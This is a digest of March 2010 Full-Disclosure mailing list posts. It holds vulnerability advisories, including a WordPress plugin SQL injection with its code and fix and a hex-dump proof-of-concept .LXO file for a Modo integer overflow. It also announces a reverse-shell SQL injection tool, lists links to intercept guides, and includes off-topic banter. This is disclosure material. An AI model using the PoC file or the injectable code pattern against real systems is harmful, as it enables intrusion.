Re: [Full-disclosure] [SECURITY] [DSA 2004-1] New samba packages fix several vulnerabilities
On Mon, Mar 1, 2010 at 18:41, Dan Rosenberg dan.j.rosenb...@gmail.com wrote: Apologies if this seems petty, but I'd like to claim credit for discovery of the second issue in this report (CVE-2010-0547). Without having verified your claim either way, I don't think it is petty of you to claim credit. Proper attribution is one of the key factors around FLOSS, imo. Richard ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I am furious.
Actually it is stochastic resonance. -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full- disclosure-boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu Sent: Monday, March 01, 2010 3:37 PM To: intel unit Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] I am furious. On Mon, 01 Mar 2010 18:48:22 GMT, intel unit said: We are security experts nothing to do with hackers and 0-day. I don't have just 1 0day. I have 26 0days and can hack anything if the price is right. Cognitive dissonance FTW. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Wordpress plugin 'Analytics360'- authenticated user sql injection
Hi there, here's an update to this advisory. Affected Versions are now = 1.2.1. Reasoning: I noticed, that the author tried to fix this bug by implementing validation via regex matching. Sadly, that regex can be bypassed easily because it only checks if a valid date string is in the GET param. That said, it should be clear that the sql injection is unfixed in version 1.2.1. The fix in Version 1.2.1 looks like this: - $start = (preg_match('/\\d{4}-\\d{2}-\\d{2}/', $_GET['start_date']) ? $_GET['start_date'] : '-00-00'); $end = (preg_match('/\\d{4}-\\d{2}-\\d{2}/', $_GET['end_date']) ? $_GET['end_date'] : '-00-00'); add_filter('posts_where', create_function( '$where', 'return $where. AND post_date = \''.$start.'\' AND post_date \''.$end.'\';' )); -- As you can see, the Regexp pattern is missing terminations in the form of START / END. Please change the first two lines like this: $start = (preg_match('/^\\d{4}-\\d{2}-\\d{2}$/', $_GET['start_date']) ? $_GET['start_date'] : '-00-00'); $end = (preg_match('/^\\d{4}-\\d{2}-\\d{2}$/', $_GET['end_date']) ? $_GET['end_date'] : '-00-00'); Regards PS: That site loads now, but there's no email contact listed. Sad for them. 2010/3/1 Jan G.B. ro0ot.w...@googlemail.com Hi there, I just noticed that authenticated users for the admin area of a wordpress blog may inject code into database queries, when the plugin Analytics360 is activated. ### BASIC INFORMATION ### Plugin Name: Analytics360 Plugin URI: http://www.mailchimp.com/wordpress_analytics_plugin/?pid=wordpresssource=website Author: Crowd Favorite Author URI: http://crowdfavorite.com ### Affected Version ### Analytics360 v.1.2 (and earlier Versions, I guess…) ### Risk ### Well, I can't classify this. When you're not insane, you shouldn't have people as admins, who inject code into the database queries. But, when you have such admins, or your WP-Login is collected by phishing or something alike, your db server and data may be at risk. It all depends on your setup and permissions. However, the bug is easy to fix and so it should be fixed. http://codex.wordpress.org/Function_Reference/wpdb_Class#Run_Any_Query_on_the_Database ### DETAILS ### The code contains this evil part in analytics360.php: case 'get_wp_posts': add_filter('posts_where', create_function( '$where', 'return $where. AND post_date = \''.$_GET['start_date'].'\' AND post_date \''.$_GET['end_date'].'\';' )); ### Disclosure Timeline ### You're the first to know. Anyone is able to telnet crowdfavorite.com:80 ? As I'm writing this, the site is unresponsive. So this is what happens when you include a website as contact information: you don't get the message. Regards ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I have been threatened.
Yahoo.com has assassins? Wow! -Original Message- From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of valdis.kletni...@vt.edu Sent: Monday, March 01, 2010 6:07 PM To: intel unit Cc: full-disclosure@lists.grok.org.uk Subject: Re: [Full-disclosure] I have been threatened. On Mon, 01 Mar 2010 22:39:56 GMT, intel unit said: SOMEONE HELP. Take your meds and call us in the morning. Seriously. Yahoo probably hired assassins to take me out. This is probably going to end up on valleywag or something. (a) Apply Occam's Razor - which is simpler and more likely, that your sorry ass is in fact being targeted by Yahoo assassins because you know Important Stuff, or you're just having another paranoid episode that manifests as thinking assassins are after you because you know Important Stuff? (Hint 1: what in the cited text implies assassins? Zero. Hint 2: What are the chances that you're valuable enough to be worth a bullet plus the plane ticket for the assassin, and you're still unable to get a job in the field?) (b) Why do you rate a mention on valleywag if it actually happens? Sorry guys. I won't be coming back. cues up Same old song and dance by Aerosmith... Yeah, we've heard THAT before. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I have been threatened.
Yahoo.com has assassins? Wow! User-agent: Slurp Disallow: * ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I have been threatened.
On Tue, 02 Mar 2010 09:01:59 EST, Kain, Becki (B.) said: Yahoo.com has assassins? Wow! Not just assassins. Super secret ninja assassins that nobody else can see. ;) pgpDOpXuczU5X.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I have been threatened.
Mini Ninjas! On 2 March 2010 16:06, valdis.kletni...@vt.edu wrote: On Tue, 02 Mar 2010 09:01:59 EST, Kain, Becki (B.) said: Yahoo.com has assassins? Wow! Not just assassins. Super secret ninja assassins that nobody else can see. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] WebRaider [TOOL]
I did a demo of WebRaider in AppSec DC 2009 and finally managed to release it. WebRaider is a PoC quality tool to get a reverse shell out of SQL Injections (MSSQL) by using One Click Ownage ( http://www.mavitunasecurity.com/s/research/OneClickOwnage.pdf ). Slides: http://www.slideshare.net/fmavituna/one-click-ownage-ferruh-mavituna-3 It's licensed under GPLv3 and all the source code is in the Google Code SVN. Source code includes all the required files to create your own payload for manually using One Click Ownage attack as well. More information about the tool, source code and download: http://www.mavitunasecurity.com/blog/webraider/ -- .fm ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I have been threatened.
If Yahoo has ninjas, what does Google have ?! @#! Sent from my iPhone On 2 Mar 2010, at 16:08, James Rankin kz2...@googlemail.com wrote: Mini Ninjas! On 2 March 2010 16:06, valdis.kletni...@vt.edu wrote: On Tue, 02 Mar 2010 09:01:59 EST, Kain, Becki (B.) said: Yahoo.com has assassins? Wow! Not just assassins. Super secret ninja assassins that nobody else can see. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] I have been threatened.
I've heard about these ninjas, the only way to escape their powers is a ten-strip to your face. On Tue, Mar 2, 2010 at 11:19 AM, Benji m...@b3nji.com wrote: If Yahoo has ninjas, what does Google have ?! @#! Sent from my iPhone On 2 Mar 2010, at 16:08, James Rankin kz2...@googlemail.com wrote: Mini Ninjas! On 2 March 2010 16:06, valdis.kletni...@vt.edu wrote: On Tue, 02 Mar 2010 09:01:59 EST, Kain, Becki (B.) said: Yahoo.com has assassins? Wow! Not just assassins. Super secret ninja assassins that nobody else can see. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- FD1D E574 6CAB 2FAF 2921 F22E B8B7 9D0D 99FF A73C http://pgp.mit.edu:11371/pks/lookup?search=tbiehnop=indexfingerprint=on http://pastebin.com/f6fd606da ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Luxology Modo 401 .LXO Integer Overflow
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Core Security Technologies - CoreLabs Advisory http://www.coresecurity.com/corelabs/ Luxology Modo 401 .LXO Integer Overflow 1. *Advisory Information* Title: Luxology Modo 401 .LXO Integer Overflow Advisory Id: CORE-2009-0913 Advisory URL: http://www.coresecurity.com/content/luxology-modo-lxo-vulnerability Date published: 2009-03-02 Date of last update: 2010-03-02 Vendors contacted: Luxology LLC Release mode: User release 2. *Vulnerability Information* Class: Failure to Sanitize Data into a Different Plane [CWE-74] Impact: Code execution Remotely Exploitable: Yes (client side) Locally Exploitable: No Bugtraq ID: 38460 CVE Name: CVE-2010-0766 3. *Vulnerability Description* Modo 401[2] is an advanced polygon, subdivision surface, modeling, sculpting, 3D painting, animation and rendering package developed by Luxology LLC [3]. The function Swap4 in valet4.dll takes a length and an input buffer and proceeds to reverse DWORDs in the input buffer for proper endianness. In the case of the CHNL subchunk in which passing an invalid length to the Swap4 function would reverse every DWORD in the stack, both reversing SEH pointer near the bottom of the stack AND causing an exception An attacker can take full control of the machine where Luxology Modo 401 is installed by sending a specially crafted .LXO file and enticing the user to open it. 4. *Vulnerable packages* . Luxology Modo 401 - Windows . Older versions are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* The vendor did not provide fixes or workaround information. To determine if a .LXO is suspicious you could parse the content of the file searching for CHNL subchunk and validate its length. 6. *Credits* This vulnerability was discovered and researched by Diego Juarez and Nadia Rodriguez from Core Security Technologies during Bugweek 2009 [1]. 7. *Technical Description / Proof of Concept Code* The LXO file format is derived from the metaformat for binary files described in EA IFF 85 Standard for Interchange Format Files.[4] Mainly consisting of chunks and subchunks. While parsing subchunks, the function Swap4 in valet4.dll takes a length and an input buffer and proceeds to reverse DWORDs in the input buffer for proper endianness. A vulnerability was observed in the case of the CHNL subchunk in which passing an invalid length to the Swap4 function would reverse every DWORD in the stack, both reversing SEH pointer near the bottom of the stack AND causing an exception (ie: forcing a call to the now reversed SEH pointer). We belive this condition may be exploitable in some scenarios as long as the address of function __except_handler3 in kernel32.dll has a least significant byte 0x7F. Proof of concept: Here is a 464 bytes long LXO file demonstrating the issue /- : 46 4F 52 4D-00 00 01 C4-4C 58 4F 42-54 41 47 53 FORM ?-LXOBTAGS 0010: 00 00 00 08-44 65 66 61-75 6C 74 00-4C 41 59 52 ?Default LAYR 0020: 00 00 00 1A-00 00 00 00-00 00 00 00-00 00 00 00 ? 0030: 00 00 00 00-6C 61 79 65-72 6E 61 6D-65 00 50 4E layername PN 0040: 54 53 00 00-00 60 BF 00-00 00 BF 00-00 00 BF 00 TS `+ + + 0050: 00 00 3F 00-00 00 BF 00-00 00 BF 00-00 00 3F 00? + + ? 0060: 00 00 BF 00-00 00 3F 00-00 00 BF 00-00 00 BF 00+ ? + + 0070: 00 00 3F 00-00 00 BF 00-00 00 3F 00-00 00 BF 00? + ? + 0080: 00 00 3F 00-00 00 3F 00-00 00 BF 00-00 00 3F 00? ? + ? 0090: 00 00 3F 00-00 00 3F 00-00 00 BF 00-00 00 3F 00? ? + ? 00A0: 00 00 3F 00-00 00 42 42-4F 58 00 00-00 18 BF 00? BBOX ?+ 00B0: 00 00 BF 00-00 00 BF 00-00 00 3F 00-00 00 3F 00+ + ? ? 00C0: 00 00 3F 00-00 00 50 4F-4C 53 00 00-00 40 46 41? POLS @FA 00D0: 43 45 00 04-00 00 00 01-00 02 00 03-00 04 00 00 CE ? ? ? ? ? 00E0: 00 04 00 05-00 01 00 04-00 01 00 05-00 06 00 02 ? ? ? ? ? ? ? ? 00F0: 00 04 00 03-00 02 00 06-00 07 00 04-00 00 00 03 ? ? ? ? ? ? 0100: 00 07 00 04-00 04 00 04-00 07 00 06-00 05 50 54 ? ? ? ? ?PT 0110: 41 47 00 00-00 1C 53 55-52 46 00 00-00 00 00 01 AG ?SURF ? 0120: 00 00 00 02-00 00 00 03-00 00 00 04-00 00 00 05 ? ? ? ? 0130: 00 00 53 55-52 46 00 00-00 2A 44 65-66 61 75 6CSURF *Defaul 0140: 74 00 00 00-43 4F 4C 52-00 0E 3F 48-C8 8A 3F 48 t COLR ??H+è?H 0150: C8 8A 3F 48-C8 8A 00 00-44 49 46 46-00 06 3F 80 +è?H+è DIFF ??Ç 0160: 00 00 00 00-49 54 45 4D-00 00 00 64-70 6F 6C 79 ITEM dpoly 0170: 52 65 6E 64-65 72 00 06-00 00 00 00-00 03 4C 49 Render ? ?LI 0180: 4E 4B 00 10-70 61 72 65-6E 74 00 00-00 00 00 03 NK ?parent ? 0190: 00 00 00 00-43 48 4E 56-00 22 61 6D-62 43 6F 6C CHNV ambCol 01A0: 6F 72 00 00-00 02 00 00-00 03 52 00-40 00 00 00 or ? ?R @ 01B0: 47 00 3F 80-00 00 42 00-3F 80
Re: [Full-disclosure] I have been threatened.
At risk of adding to the noise but I can't help myself... [cid:image001.jpg@01CABA1A.719C1190] Anyone have a pic of n3td3v to chop into this one? From: full-disclosure-boun...@lists.grok.org.uk [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Benji Sent: Tuesday, March 02, 2010 11:19 AM To: James Rankin Cc: full-disclosure@lists.grok.org.uk; valdis.kletni...@vt.edu Subject: Re: [Full-disclosure] I have been threatened. If Yahoo has ninjas, what does Google have ?! @#! Sent from my iPhone On 2 Mar 2010, at 16:08, James Rankin kz2...@googlemail.commailto:kz2...@googlemail.com wrote: Mini Ninjas! On 2 March 2010 16:06, mailto:valdis.kletni...@vt.eduvaldis.kletni...@vt.edumailto:valdis.kletni...@vt.edu wrote: On Tue, 02 Mar 2010 09:01:59 EST, Kain, Becki (B.) said: Yahoo.comhttp://Yahoo.com has assassins? Wow! Not just assassins. Super secret ninja assassins that nobody else can see. ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ -- On two occasions...I have been asked, 'Pray, Mr Babbage, if you put into the machine wrong figures, will the right answers come out?' I am not able rightly to apprehend the kind of confusion of ideas that could provoke such a question. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ http://secunia.com/ This message is intended only for the person(s) to which it is addressed and may contain privileged, confidential and/or insider information.. If you have received this communication in error, please notify us immediately by replying to the message and deleting it from your computer. Any disclosure, copying, distribution, or the taking of any action concerning the contents of this message and any attachment(s) by anyone other than the named recipient(s) is strictly prohibited. inline: image001.jpg___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ZDI-10-024: Novell eDirectory SOAP Request Parsing Denial of Service Vulnerability
ZDI-10-024: Novell eDirectory SOAP Request Parsing Denial of Service Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-10-024 March 2, 2010 -- Affected Vendors: Novell -- Affected Products: Novell eDirectory -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 8289. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to deny services on vulnerable installations of Novell eDirectory Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the NDS daemon's SOAP service. When a malformed request is made to the novell.embox.connmgr.serverinfo SOAP action, the daemon makes an illegal reference thereby resulting in a denial of service. -- Vendor Response: Novell has issued an update to correct this vulnerability. More details can be found at: http://www.novell.com/support/viewContent.do?externalId=7005341 -- Disclosure Timeline: 2009-03-13 - Vulnerability reported to vendor 2010-03-02 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * 1c239c43f521145fa8385d64a9c32243 -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [ MDVSA-2010:053 ] apache
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDVSA-2010:053 http://www.mandriva.com/security/ ___ Package : apache Date: March 2, 2010 Affected: 2008.0, 2009.0, 2009.1, 2010.0, Corporate 4.0, Enterprise Server 5.0 ___ Problem Description: A vulnerabilitiy has been found and corrected in apache: mod_proxy_ajp: Respond with HTTP_BAD_REQUEST when the body is not sent after request headers indicate a request body is incoming; this is not a case of HTTP_INTERNAL_SERVER_ERROR (CVE-2010-0408). Packages for 2008.0 are provided for Corporate Desktop 2008.0 customers. The updated packages have been patched to correct this issue. ___ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0408 http://svn.apache.org/viewvc?view=revisionrevision=917876 ___ Updated Packages: Mandriva Linux 2008.0: 40f669ea382b3538dde81ad38a795e62 2008.0/i586/apache-base-2.2.6-8.4mdv2008.0.i586.rpm 8a4b1766f7ae8b2c89da089483ab631a 2008.0/i586/apache-devel-2.2.6-8.4mdv2008.0.i586.rpm 79ef5429c6ff23f7d3e36e55fa7eb337 2008.0/i586/apache-htcacheclean-2.2.6-8.4mdv2008.0.i586.rpm b5daf8c38f966c954e2e390b72f96f43 2008.0/i586/apache-mod_authn_dbd-2.2.6-8.4mdv2008.0.i586.rpm 1a1deef5314f3f3af5efdfff0c2174c8 2008.0/i586/apache-mod_cache-2.2.6-8.4mdv2008.0.i586.rpm fd09dd7f4f45f5f3bcfa9b3fe2988ca7 2008.0/i586/apache-mod_dav-2.2.6-8.4mdv2008.0.i586.rpm a75f7016acd28d0299aff23034a9c9a5 2008.0/i586/apache-mod_dbd-2.2.6-8.4mdv2008.0.i586.rpm bcc0278820cb4636bed90bb270c866f6 2008.0/i586/apache-mod_deflate-2.2.6-8.4mdv2008.0.i586.rpm ff5036fe0198981d76f80a593c7e1352 2008.0/i586/apache-mod_disk_cache-2.2.6-8.4mdv2008.0.i586.rpm 6081757ebbd25a946f69e809d1f78ddd 2008.0/i586/apache-mod_file_cache-2.2.6-8.4mdv2008.0.i586.rpm 73235154c09c6535b2669320ec5998c8 2008.0/i586/apache-mod_ldap-2.2.6-8.4mdv2008.0.i586.rpm 26bfa122186aab9bd42e6b544f009526 2008.0/i586/apache-mod_mem_cache-2.2.6-8.4mdv2008.0.i586.rpm cd34c5ce29e73fcaee7f551268d767d0 2008.0/i586/apache-mod_proxy-2.2.6-8.4mdv2008.0.i586.rpm 03e0a09ddf2db8eabf28932d51184c3e 2008.0/i586/apache-mod_proxy_ajp-2.2.6-8.4mdv2008.0.i586.rpm 7685e9811bd17f67e4d9f0f081fe7e6a 2008.0/i586/apache-mod_ssl-2.2.6-8.4mdv2008.0.i586.rpm a5a9783f21d611b13f223a1e00811dc0 2008.0/i586/apache-modules-2.2.6-8.4mdv2008.0.i586.rpm 35a0025324252c67a7b3bd4a07c1dc83 2008.0/i586/apache-mod_userdir-2.2.6-8.4mdv2008.0.i586.rpm 47ee3f3cdab11c9b8abab50b10057760 2008.0/i586/apache-mpm-event-2.2.6-8.4mdv2008.0.i586.rpm fcd4132afa594a545ea40503cc104352 2008.0/i586/apache-mpm-itk-2.2.6-8.4mdv2008.0.i586.rpm 7da7f96fecd7a2c0572bd7898818eade 2008.0/i586/apache-mpm-prefork-2.2.6-8.4mdv2008.0.i586.rpm 00f4a6ea2d4ca956badb2d83b7380ade 2008.0/i586/apache-mpm-worker-2.2.6-8.4mdv2008.0.i586.rpm 6b142394734782ebffd4a98d8b4ce7b4 2008.0/i586/apache-source-2.2.6-8.4mdv2008.0.i586.rpm 96f50149da097b04f85eb167f6f33b07 2008.0/SRPMS/apache-2.2.6-8.4mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 68ccba9d9101a395d3dd82e566012086 2008.0/x86_64/apache-base-2.2.6-8.4mdv2008.0.x86_64.rpm 0c7a4c5237f7f8fde483a5acc9d35a48 2008.0/x86_64/apache-devel-2.2.6-8.4mdv2008.0.x86_64.rpm 5c7ce4acded851690eff881b33e6825e 2008.0/x86_64/apache-htcacheclean-2.2.6-8.4mdv2008.0.x86_64.rpm c680b8d203e6305c365a5f1e968856dd 2008.0/x86_64/apache-mod_authn_dbd-2.2.6-8.4mdv2008.0.x86_64.rpm b4f5650d9c874d7e74207afeb3f46a2f 2008.0/x86_64/apache-mod_cache-2.2.6-8.4mdv2008.0.x86_64.rpm 07f86779cf882a54d564e5bf083abb57 2008.0/x86_64/apache-mod_dav-2.2.6-8.4mdv2008.0.x86_64.rpm 83ad4efebf59f5791f5aec3fa6e10323 2008.0/x86_64/apache-mod_dbd-2.2.6-8.4mdv2008.0.x86_64.rpm cd7b9410bacaacf9bb388b9027162f87 2008.0/x86_64/apache-mod_deflate-2.2.6-8.4mdv2008.0.x86_64.rpm 2f1782fd84954049e0519776b2915b7e 2008.0/x86_64/apache-mod_disk_cache-2.2.6-8.4mdv2008.0.x86_64.rpm 94de2c4c084849f200cab34d17d88871 2008.0/x86_64/apache-mod_file_cache-2.2.6-8.4mdv2008.0.x86_64.rpm e56e4c6222c9a85b853c4025da617af4 2008.0/x86_64/apache-mod_ldap-2.2.6-8.4mdv2008.0.x86_64.rpm 0255b975911a4347a81640f7c142c579 2008.0/x86_64/apache-mod_mem_cache-2.2.6-8.4mdv2008.0.x86_64.rpm 16ed3ba33747dc338a66d0602ff1cfb7 2008.0/x86_64/apache-mod_proxy-2.2.6-8.4mdv2008.0.x86_64.rpm 5fff7d4376987a138e4c444657a044c6 2008.0/x86_64/apache-mod_proxy_ajp-2.2.6-8.4mdv2008.0.x86_64.rpm 91d9958fcdbacc2ff12cdc038bbc1488 2008.0/x86_64/apache-mod_ssl-2.2.6-8.4mdv2008.0.x86_64.rpm 8d5830fd49f9208a6d3e670406c739e8 2008.0/x86_64/apache-modules-2.2.6-8.4mdv2008.0.x86_64.rpm
[Full-disclosure] NSOADV-2010-004: McAfee LinuxShield remote/local code execution
__ NSOADV-2010-004: McAfee LinuxShield remote/local code execution __ __ 0 1 00110 0011000 11 01 01 1 10 1 0 11 01 0 11 1 1 111011001 101 1 11 0110111 110 1001 0 1 10 11 0 10 11 111 1 111 111001 1 0 10 0 11 11 1 1 1101 10 00111 0 0 11 00 0 1110 1 10111 111 11 100 1011 0 01 0 1 1 10 11 1 011 00 0110 1110 1 0 11101011 11100 00 0 0 10 1110 1 01 1 1101 01 01110 0 10 10 110 0 111010101 11 11 0 0 1 1 1 1 1101 111 10110 10 010 1 0 0 1 110 111 1 1 1 111 1 10011 10110 0 1100 111 10 110 10100010 111 11 0011100 11 10 001100 0001 11 10 11 0 0 00100 1 10 1 101010001 111010 1011 100100 111001101 0 0110 111011011 0110 10001101 0 1011 1 10 101 0101 00 1010 1 11001 1 1101 10 110101011 0 101 0 11011 111 __ __ Title: McAfee LinuxShield remote/local code execution Severity: Medium Advisory ID:NSOADV-2010-004 Found Date: 07.12.2009 Date Reported: 05.02.2010 Release Date: 02.03.2010 Author: Nikolas Sotiriu (lofi) Website:http://sotiriu.de Twitter:http://twitter.com/nsoresearch Mail: nso-research at sotiriu.de URL:http://sotiriu.de/adv/NSOADV-2010-004.txt Vendor: McAfee (http://www.mcafee.com/) Affected Products: McAfee LinuxShield = 1.5.1 Not Affected Products: McAfee LinuxShield 1.5.1 with HF550192 Remote Exploitable: Yes (attacker must be authenticated) Local Exploitable: Yes Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Thanks to: Thierry Zoller: For the permission to use his Policy Background: === LinuxShield detects and removes viruses and other potentially unwanted software on Linux-based systems. LinuxShield uses the powerful McAfee scanning engine — the engine common to all our anti-virus products. Although a few years ago, the Linux operating system was considered a secure environment, it is now seeing more occurrences of software specifically written to attack or exploit security weaknesses in Linux-based systems. Increasingly, Linux-based systems interact with Windows-based computers. Although viruses written to attack Windows- based systems do not directly attack Linux systems, a Linux server can harbor these viruses, ready to infect any client that connects to it. When installed on your Linux systems, LinuxShield provides protection against viruses, Trojan horses, and other types of potentially unwanted software. LinuxShield scans files as they are opened and closed — a technique known as on-access scanning. LinuxShield also incorporates an on-demand scanner that enables you to scan any directory or file in your host at any time. When kept up-to-date with the latest virus-definition (DAT) files, LinuxShield is an important part of your network security. We recommend that you set up an anti-virus security policy for your network, incorporating as many protective measures as possible. LinuxShield uses a web-browser interface, and a large number of LinuxShield installations can be centrally controlled by ePolicy Orchestrator. (Product description from LinuxShield Product Guide) Description: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of McAfee LinuxShield. User interaction is not required to exploit this vulnerability but an attacker must be authenticated. The LinuxShield Webinterface communicates with the localy installed nailsd daemon, which listens on port 65443/tcp, to do configuration changes, query the configuration and execute tasks. Each user, which can login to the victim box, can also authenticate it self to the
[Full-disclosure] Making Hacking a Spectator Sport
Dear List, I'm putting on a small hacking competition and am interested in making it as accessible and interesting as possible to potentially uninformed spectators. Does anyone have recommendations for network visualization and auralization software that could produce pretty animations and suitable background audio? I'd be interested in any tips for making the output as security-relevant as possible. Packet Garden is sweet, and there are a number of other straight-up network traffic visualization and auralization packages that look like they'd produce suitable output, but I'm thinking I'll need to hook them up to Snort logs rather tcpdump captures or Apache logs. Thoughts? Cheers, Chris C. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Making Hacking a Spectator Sport
Hi Chris, Maybe take a look at GLtail -- http://www.fudgie.org Cheers, --scm On Tue, Mar 2, 2010 at 10:38 AM, Christopher Covington c...@vt.edu wrote: Does anyone have recommendations for network visualization and auralization software that could produce pretty animations and suitable background audio? ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cryptome Spying guides as a Digital Forensic Resource
For those who missed all the action http://blogs.sans.org/computer-forensics/2010/03/02/cryptome-spying-guides-as-a-digital-forensic-resource/ *Microsoft* – http://cryptome.org//isp-spy/microsoft-spy.zip *Paypal* – http://cryptome.org/isp-spy/paypal-spy.zip *MySpace* – http://cryptome.org/isp-spy/myspace-spy.pdf *Facebook* – http://cryptome.org/isp-spy/comcast-spy.pdf *AOL* – http://cryptome.org/isp-spy/aol-spy.pdf *Skype* – http://cryptome.org/isp-spy/skype-spy.pdf *Cox Communications* – http://cryptome.org/isp-spy/cox-spy.pdf *Ning* – http://cryptome.org/isp-spy/ning-spy.pdf *MyYearbook* – http://cryptome.org/isp-spy/myyearbook-spy.pdf *Stickam* – http://cryptome.org/isp-spy/stickam-spy.pdf *USPS Requests* http://cryptome.org/isp-spy/usps-spy.pdf / http://cryptome.org/isp-spy/usps-spy2.pdf *Cisco* – http://cryptome.org/isp-spy/cisco-spy.pdf *3GPP* – http://cryptome.org/3gpp/3gpp-spy.htm *ATT *- http://cryptome.org/isp-spy/att-spy-doc-01.pdf / http://cryptome.org/isp-spy/att-spy-doc-02.zip *Verizon* – http://cryptome.org/isp-spy/verizon-spy.pdf *Sprint CALEA Delivery* – http://cryptome.org/isp-spy/sprint-spy2.pdf *Sprint* – http://cryptome.org/isp-spy/sprint-spy.zip *Nextel* – http://cryptome.org/isp-spy/nextel-spy.pdf *Voicestream* – http://cryptome.org/isp-spy/voicestream-spy.zip *Yahoo* – http://cryptome.org/isp-spy/yahoo-spy.pdf *SBC-Ameritech* – http://cryptome.org/isp-spy/sbc-ameritech-spy.pdf *Ameritech* – http://cryptome.org/isp-spy/ameritech-spy.pdf *SBC-LEA* – http://cryptome.org/isp-spy/ameritech-spy.pdf *Cingular* – http://cryptome.org/isp-spy/cingular-spy.pdf *Cricket* – 